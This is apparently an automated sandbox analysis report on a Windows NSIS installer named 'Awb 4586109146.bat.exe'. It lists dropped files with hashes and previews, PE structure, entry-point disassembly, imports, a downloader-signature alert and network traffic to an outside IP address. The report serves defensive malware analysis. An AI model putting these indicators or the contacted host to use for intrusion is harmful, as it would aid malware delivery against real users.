                                                          Uniswap Sniper Bot With GUI.exeGet hashmaliciousUnknownBrowse
                                                            naukri-launcher 10.exeGet hashmaliciousUnknownBrowse
                                                              naukri-launcher 10.exeGet hashmaliciousUnknownBrowse
                                                                installer.exeGet hashmaliciousUnknownBrowse
                                                                  Process:C:\Users\user\Desktop\Awb 4586109146.bat.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):5632
                                                                  Entropy (8bit):3.818015063694808
                                                                  Encrypted:false
                                                                  SSDEEP:48:S46+/zTKYKxbWsptIpBtWZ0iV8jAWiAJCvxft2O2B8mxofjLl:z5uPbOBtWZBV8jAWiAJCdv2CmAL
                                                                  MD5:AB1DB56369412FE8476FEFFFD11E4CC0
                                                                  SHA1:DAAD036A83B2EE2FA86D840A34A341100552E723
                                                                  SHA-256:6F14C8F01F50A30743DAC68C5AC813451463DFB427EB4E35FCDFE2410E1A913B
                                                                  SHA-512:8D886643B4FC24ADF78F76B663227D6E61863F89E0CBD49548F40DD040666CA94EA46BEC9E336850E4F300995D56E6DC85B689C8E09FF46758822D280F06B03D
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: kJs0JTLO6I.exe, Detection: malicious, Browse
                                                                  • Filename: kJs0JTLO6I.exe, Detection: malicious, Browse
                                                                  • Filename: B7zKt98iey.exe, Detection: malicious, Browse
                                                                  • Filename: B7zKt98iey.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: , Detection: malicious, Browse
                                                                  • Filename: , Detection: malicious, Browse
                                                                  • Filename: ROM_Files_939964.exe, Detection: malicious, Browse
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L....~.\...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\Awb 4586109146.bat.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):12288
                                                                  Entropy (8bit):5.719859767584478
                                                                  Encrypted:false
                                                                  SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                  MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                  SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                  SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                  SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: YF3YnL4ksc.exe, Detection: malicious, Browse
                                                                  • Filename: YF3YnL4ksc.exe, Detection: malicious, Browse
                                                                  • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                                  • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                                  • Filename: AyqwnIUrcz.exe, Detection: malicious, Browse
                                                                  • Filename: Uniswap Sniper Bot With GUI.exe, Detection: malicious, Browse
                                                                  • Filename: Uniswap Sniper Bot With GUI.exe, Detection: malicious, Browse
                                                                  • Filename: naukri-launcher 10.exe, Detection: malicious, Browse
                                                                  • Filename: naukri-launcher 10.exe, Detection: malicious, Browse
                                                                  • Filename: installer.exe, Detection: malicious, Browse
                                                                  Reputation:high, very likely benign file
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\Awb 4586109146.bat.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1850292
                                                                  Entropy (8bit):0.15787706683171052
                                                                  Encrypted:false
                                                                  SSDEEP:768:OoaZJLqGy5Qo+RU46dPn7e4O7QkhE/EtrgCN85RaQ7EMB+6r26REcybaHpJkCCXx:yHV
                                                                  MD5:F1B19352186CB57567C88C002F5AF9BD
                                                                  SHA1:96BB06DBF3E930E8174E22C552E788BF62F8792E
                                                                  SHA-256:9B172DB9C04C16B1C75AA5EEDFA5500FB4650BC59282BBCB5BB2D983C4B00406
                                                                  SHA-512:AF16686666C2B9CB40C67D79DDA844550ECEA72CD2537F1CEAC0A944799409B5C157ACDA2700327998EAC3FD07A94CB6FA0A3708C24E24403844C092AA1A7AA2
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:...............................................................................................................................................................`.....................................................................................................................................................................................................................................................................................................................!...........................................................................................................................................................................................................................................................................................m...............................................................................Y......................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\Awb 4586109146.bat.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1264154
                                                                  Entropy (8bit):0.15737251343733819
                                                                  Encrypted:false
                                                                  SSDEEP:768:Kz/OAFYCddplBJdxt7g7a6CgpChVGVUOgCwE6o5p5/wrS1jY:YTS
                                                                  MD5:5F2597B55457B6EA842E218E8D3B098D
                                                                  SHA1:0795BC493C7B065EF549AA73C4FE9E3384566E7A
                                                                  SHA-256:6E30C08BC1D4AD6E942130B8F9EFA770DC1812938298114ACC187DD436DB6006
                                                                  SHA-512:1DBE04D8CDD6E4881EFB1FA0619728E983EC3E14445D8A9E70796DFB55DA950C255CA30856F6D8B3BF79EC71B9284C07ECD7CD1662E5C9ED2C51B947C4A79FA0
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................-........................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\Awb 4586109146.bat.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):275739
                                                                  Entropy (8bit):7.616966107008561
                                                                  Encrypted:false
                                                                  SSDEEP:6144:bQtPgXRjxGphacIiNMK4jChJ5NV4SW9qAFEOM9D:4gNxGpRbMKyChJ5Ncq9z9D
                                                                  MD5:8D798E6993F3500FE5366F149F86ED14
                                                                  SHA1:28F0294D9A37F1F1BB4B0882A89842239493A441
                                                                  SHA-256:FB29B102FE2AB99935BB1671A8962DE3CEC97B2F88A438F7CDF23D24C6CA8BD9
                                                                  SHA-512:928DA5C68A8EA94C0944B32A922D870DC92A62DB24B5B083EE991EF00542BB450A0B52EC89BEC9512564C851C7CE49C6DCEDF7C6EBF933E7B7BA1C5868E2DE2D
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:..................>.............L.....................B........................."......ZZZZZ...CCCC...........n....gg...).............................................d..\...F.....SS..U..u............J...........<..........0....66.........|......zzzzz....##.......3..OOOO..........****.................ppp...................SS..........YY...n......0.OOO.........L..7.........d.....Y......f..........................w..R........PP...........HHHH.................sss. ...`.C.%...QQ.w............**..))))...........!......222222...dd.........WWWW.....n..........w............9..............z..J...]..44...>......QQQ.............**.... ................<.........~~~............]]]......MM.\................=.........77777..........kkk............m......................l...........c...............##.........??....0..........(...?...............................88....................www.....=.---.....x........zz.............VVV.......--.......>>..........^^....n...........FFFF...AAA...............P.....
                                                                  Process:C:\Users\user\Desktop\Awb 4586109146.bat.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1785286
                                                                  Entropy (8bit):0.157818699705013
                                                                  Encrypted:false
                                                                  SSDEEP:768:igjhkFxRk4Cg3EFcNweXS+wUya8d0Dclmrwtx9Rh0hruNz5S2L8HeM+MQ4Ee4EsK:gT
                                                                  MD5:E75D60F1347F2887587045D4F6673154
                                                                  SHA1:56930A609A1C67A591A557F7610ACFFCD89AB025
                                                                  SHA-256:CEDE7492DB5C81B0B046258187557EE9B2C6E791021631FF635409395ED6054A
                                                                  SHA-512:76060B17EB25286EE47558B72A5C034EF2D0D5EDBE8205F57628740900CB39F81953EC5A5C917CE84FD7ED5FDA6F03AC9C819B598D58B9D2AF12CFB3F5385830
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:...........................................................................................g......................................................................................................................U......................................................................................................................................................................................................................................................................................................................2..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\Awb 4586109146.bat.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):3072070
                                                                  Entropy (8bit):0.1574149435101028
                                                                  Encrypted:false
                                                                  SSDEEP:768:GYkPCXTz5BZxw9NxlQnAyZSMNwxpqOKNcB5YdPpxk7r6s5WQxNUUlkwrvUcM0gg6:Ln/
                                                                  MD5:1A32E4C0027DC7FF10A50CA03C8A1DF9
                                                                  SHA1:D4C66E381A195EF0E71110645E35C02FA642614D
                                                                  SHA-256:323EDBC20508A0DB8FDB408E29A45ED0606E5366791CDA820E0ECD4C1A62B37E
                                                                  SHA-512:94D2B7A01C557AE2C079785DC8756BDFA5F4EDD4AADFA389D1D8877F94BC122B58AC13731B286FF262C7CA68FEEA5552E99AB5FCB414493FE3C1CB739F89B1BE
                                                                  Malicious:false
                                                                  Preview:......................................................................................................................................................................................L...............................................................................................................................................n..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................F..............................................................................................................................^...................................................................
                                                                  Process:C:\Users\user\Desktop\Awb 4586109146.bat.exe
                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):102004
                                                                  Entropy (8bit):2.6510670372501517
                                                                  Encrypted:false
                                                                  SSDEEP:1536:NPyE3NTABntarYogFdEEMkG3z8l6mC2fSwdkG:8lFBtH
                                                                  MD5:D0D2FB35DEC28F06F827DF22AC20E262
                                                                  SHA1:E48B1A07732C174C82885858FD5C2C91E280E086
                                                                  SHA-256:431C1A39FA636F7AC51D9428D33D2EDE8110A599357EE13AD94DAF00A5C8343F
                                                                  SHA-512:8D8B951E2A1303F1DDCDA36C2D563AADF95B27ABD1291EE60EE2E97513DBAB160F213B3A66CB087E078725AEAA3C0F558F9C57BBC8A71AC120E57FCF680978B7
                                                                  Malicious:false
                                                                  Preview:000000D400E700A0000000000000000000C1C1C1005C5C5C5C5C5C002C2C2C00004B004141414100919100000000000000D0D00048480000DE000024009B9B000000002121212121000000000000004C000000003A3A00009500007F7F00007900000091910000FA00005F0000360026262626262626008E00EEEE006464000000ECECECECECECEC000000000000CF00A2006565000C002727270000009D9D0000000000A800EF003E0038000000FCFC0000000044004A00ABAB006E00515100009A9A00AB002A00004900ECEC000014000000DB000000FB0000777777777777777700ABABABABABAB002500000000005A5A000055550000CDCD008D008989000025000000000000800076000000006000000000000000FDFD0000003232000000009F9F000000910007070700A500D0000000BF0000000000F2F200000000001515006D00BBBB0000000000B8B8B8000071710000C600005959000000F6F600008B000000000000005E00D50067000011111100009000C000BA001A1A1A000000650000B5B5003D3D3D0000000000004E4E003100000000D2000000B3000028282828004D4D4D4D00FA00000000000606060606008A8A00E7E7E700000000009400F20000DA00E5E500F6000000000000DF000013000007070700191900000027007171004242008484000000F6006E6E000000
                                                                  Process:C:\Users\user\Desktop\Awb 4586109146.bat.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):6157882
                                                                  Entropy (8bit):0.15896061425174612
                                                                  Encrypted:false
                                                                  SSDEEP:768:g7/K3a5vYm6xqf8FLfJI80SEtK8ccB6X76bD8kNTM5N1LshHe0X9Jk4BzFIpyTVI:w5wodUqLAH6
                                                                  MD5:45CD3902AC3254547F0E44C9A016B31B
                                                                  SHA1:4B9F8CDFD0A8FADE68C4C8EF6D6A1726A601A750
                                                                  SHA-256:FF0227B020CC3CC727C369F4E938722DC16E797EB2669C764DE823FC46992664
                                                                  SHA-512:8935B6547F93FAB6F5E4CA6A258B96AECD86E2785F8DACBAD1CB6C1A641289535A6593D5E0196A56E4E4E662B20279D369F3CA39D1571147A2A92EDD8C1E9DE3
                                                                  Malicious:false
                                                                  Preview:...................................................................................................t...............................................................................................................................................................................................................................................................................................................................................................KJ...................................................................Q...........................................................................................................................................z............................................Q..................................................................................................................................................\..........................................................q........................................................................................
                                                                  Process:C:\Users\user\Desktop\Awb 4586109146.bat.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):345
                                                                  Entropy (8bit):4.294234517489459
                                                                  Encrypted:false
                                                                  SSDEEP:6:KGljJoxWTCrK0XuLmqarK5pCAyQvLoZ2kMXATrQvkt+fC3ba2AF/PXkSLAJRn:dlj+WTzJm1rKnCAyQvk2kWATrT5a2nNL
                                                                  MD5:231F388B44C110D6FDD16605BBE17E52
                                                                  SHA1:D2BEE1AAE2A003FD72A46FFDEDE1B5AB0BF89D86
                                                                  SHA-256:325DC82DFE4B64A6FE20E3824BBFE752C0156A6E4239A45AEA7BBC4F1751560D
                                                                  SHA-512:5AE947D4694D5824D4BB9F64FC5F747660C7C6993CD1B4D86D41587FD0A92BB65657C0F4855010F2E6F4BF7F1689BB2C95EC32D29FC78D2664F52ABB5ACE9081
                                                                  Malicious:false
                                                                  Preview:inchoant gowdnie medejernes inswarming salt svenaage aleksandrines forehearth..frdselslovs reformations flnseknivene.accentuationernes sudansk farfdrene nathold cryptological beskftige svrenes.naturata junket hjemfalde torskens.revelled puffed buffistens.muscularizes wankel autorhythmic liturgierne tuilles totalitarianisms asaron temperately..
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                  Entropy (8bit):7.950880274807356
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:Awb 4586109146.bat.exe
                                                                  File size:795'558 bytes
                                                                  MD5:a3bb238f798a512f7465f804735b8f9a
                                                                  SHA1:31c7c96a95c22e7f4ab58b0f5330c4c79172be79
                                                                  SHA256:9775ae8b4fa626011fb022ede69e2ec2bec2b7868bb70bda276da0145b4b410f
                                                                  SHA512:4038f9e8b93e6e4dfa4f4b7493bb2e5988ee29a2d91029fa136549f424140cf0a77426d8739d40e95c5ac943681b384bdeb966d84bce0693c24d578220c1365e
                                                                  SSDEEP:24576:4dEqcVwnUAFPtUBCSoR94Ou2sgnqVNO7qg+E5cnj:HqcVwnhFPtU7oR3uIn6NAqDE5cnj
                                                                  TLSH:44052303B24D1253EEF1813497328BF89B792D50B9B0AB03B7ED3F087D76785A91A951
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................h.........
                                                                  Icon Hash:ec92131fb7aba8f4
                                                                  Entrypoint:0x40338f
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x5C157F2E [Sat Dec 15 22:24:46 2018 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                  Instruction
                                                                  sub esp, 000002D4h
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  push 00000020h
                                                                  pop edi
                                                                  xor ebx, ebx
                                                                  push 00008001h
                                                                  mov dword ptr [esp+14h], ebx
                                                                  mov dword ptr [esp+10h], 0040A2E0h
                                                                  mov dword ptr [esp+1Ch], ebx
                                                                  call dword ptr [004080A8h]
                                                                  call dword ptr [004080A4h]
                                                                  and eax, BFFFFFFFh
                                                                  cmp ax, 00000006h
                                                                  mov dword ptr [00434EECh], eax
                                                                  je 00007FA3A4CABEC3h
                                                                  push ebx
                                                                  call 00007FA3A4CAF175h
                                                                  cmp eax, ebx
                                                                  je 00007FA3A4CABEB9h
                                                                  push 00000C00h
                                                                  call eax
                                                                  mov esi, 004082B0h
                                                                  push esi
                                                                  call 00007FA3A4CAF0EFh
                                                                  push esi
                                                                  call dword ptr [00408150h]
                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                  cmp byte ptr [esi], 00000000h
                                                                  jne 00007FA3A4CABE9Ch
                                                                  push 0000000Ah
                                                                  call 00007FA3A4CAF148h
                                                                  push 00000008h
                                                                  call 00007FA3A4CAF141h
                                                                  push 00000006h
                                                                  mov dword ptr [00434EE4h], eax
                                                                  call 00007FA3A4CAF135h
                                                                  cmp eax, ebx
                                                                  je 00007FA3A4CABEC1h
                                                                  push 0000001Eh
                                                                  call eax
                                                                  test eax, eax
                                                                  je 00007FA3A4CABEB9h
                                                                  or byte ptr [00434EEFh], 00000040h
                                                                  push ebp
                                                                  call dword ptr [00408044h]
                                                                  push ebx
                                                                  call dword ptr [004082A0h]
                                                                  mov dword ptr [00434FB8h], eax
                                                                  push ebx
                                                                  lea eax, dword ptr [esp+34h]
                                                                  push 000002B4h
                                                                  push eax
                                                                  push ebx
                                                                  push 0042B208h
                                                                  call dword ptr [00408188h]
                                                                  push 0040A2C8h
                                                                  Programming Language:
                                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x730000x7620.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x66270x680037029c3103747b9cc70c8ecd944a9b83False0.6643629807692307data6.451784672975888IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x80000x14a20x1600eecac1fed9cc6b447d50940d178404d8False0.4405184659090909data5.025178929113415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0xa0000x2aff80x600939516377e7577b622eb1ffdc4b5db4aFalse0.517578125data4.03532418489749IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .ndata0x350000x3e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x730000x76200x7800fa3a7dc11d759e32654dca4a134433eaFalse0.511328125data5.487917299032731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0x733880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4786307053941909
                                                                  RT_ICON0x759300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5318949343339587
                                                                  RT_ICON0x769d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.5804904051172708
                                                                  RT_ICON0x778800x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5766393442622951
                                                                  RT_ICON0x782080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.7026173285198556
                                                                  RT_ICON0x78ab00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672EnglishUnited States0.8035714285714286
                                                                  RT_ICON0x791780x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.6286127167630058
                                                                  RT_ICON0x796e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6037234042553191
                                                                  RT_DIALOG0x79b480xb8dataEnglishUnited States0.6467391304347826
                                                                  RT_DIALOG0x79c000x144dataEnglishUnited States0.5216049382716049
                                                                  RT_DIALOG0x79d480x100dataEnglishUnited States0.5234375
                                                                  RT_DIALOG0x79e480x11cdataEnglishUnited States0.6091549295774648
                                                                  RT_DIALOG0x79f680x60dataEnglishUnited States0.7291666666666666
                                                                  RT_GROUP_ICON0x79fc80x76dataEnglishUnited States0.6440677966101694
                                                                  RT_VERSION0x7a0400x34cdataEnglishUnited States0.4703791469194313
                                                                  RT_MANIFEST0x7a3900x290XML 1.0 document, ASCII text, with very long lines (656), with no line terminatorsEnglishUnited States0.5640243902439024
                                                                  DLLImport
                                                                  KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                  USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                  SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                  ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                  COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-12-18T11:08:09.579335+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84971184.38.133.4880TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 18, 2024 11:08:08.212618113 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:08.332236052 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:08.332341909 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:08.332715988 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:08.453609943 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:09.579253912 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:09.579334974 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:09.579350948 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:09.579385996 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:09.579422951 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:09.579428911 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:09.579469919 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:09.579469919 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:09.579479933 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:09.579515934 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:09.579514980 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:09.579561949 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:09.655630112 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:09.655673981 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:09.655694962 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:09.655695915 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:09.655726910 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:09.655726910 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:09.655771971 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:09.655807972 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:09.699529886 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:09.699716091 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:09.699713945 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:09.699779987 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:09.703449965 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:09.703528881 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:09.770303965 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:09.770451069 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:09.770490885 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:09.770522118 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:09.774529934 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:09.774652958 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:09.774658918 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:09.774727106 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:09.782856941 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:09.783051968 CET4971180192.168.2.884.38.133.48
